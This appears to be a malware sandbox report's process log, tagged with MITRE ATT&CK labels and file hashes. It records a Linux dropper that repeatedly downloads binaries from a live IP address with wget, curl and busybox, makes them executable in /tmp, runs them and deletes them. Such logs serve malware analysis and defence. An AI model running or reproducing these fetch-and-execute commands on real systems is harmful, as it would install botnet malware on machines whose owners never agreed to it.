/usr/bin/curlcurl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- Writes file to tmp directory
PID:1623
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:1624
-
-
/bin/chmodchmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- File and Directory Permissions Modification
PID:1625
-
-
/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- Executes dropped EXE
PID:1626
-
-
/bin/rmrm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:1627
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:1628
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- Writes file to tmp directory
PID:1629
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:1630
-
-
/bin/chmodchmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- File and Directory Permissions Modification
PID:1631
-
-
/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- Executes dropped EXE
PID:1632
-
-
/bin/rmrm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:1633
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:1634
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- Writes file to tmp directory
PID:1635
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:1636
-
-
/bin/chmodchmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- File and Directory Permissions Modification
PID:1637
-
-
/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- Executes dropped EXE
PID:1638
-
-
/bin/rmrm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:1639
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:1640
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- Writes file to tmp directory
PID:1641
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:1642
-
-
/bin/chmodchmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- File and Directory Permissions Modification
PID:1643
-
-
/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- Executes dropped EXE
PID:1644
-
-
/bin/rmrm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:1645
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:1646
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- Writes file to tmp directory
PID:1647
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:1648
-
-
/bin/chmodchmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- File and Directory Permissions Modification
PID:1649
-
-
/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- Executes dropped EXE
PID:1650
-
-
/bin/rmrm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:1651
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:1652
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- Writes file to tmp directory
PID:1653
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:1656
-
-
/bin/chmodchmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- File and Directory Permissions Modification
PID:1657
-
-
/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- Executes dropped EXE
PID:1658
-
-
/bin/rmrm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:1659
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:1660
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- Writes file to tmp directory
PID:1661
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:1662
-
-
/bin/chmodchmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- File and Directory Permissions Modification
PID:1663
-
-
/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- Executes dropped EXE
PID:1664
-
-
/bin/rmrm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:1665
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:1666
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- Writes file to tmp directory
PID:1667
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:1668
-
-
/bin/chmodchmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- File and Directory Permissions Modification
PID:1669
-
-
/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- Executes dropped EXE
PID:1670
-
-
/bin/rmrm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:1671
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97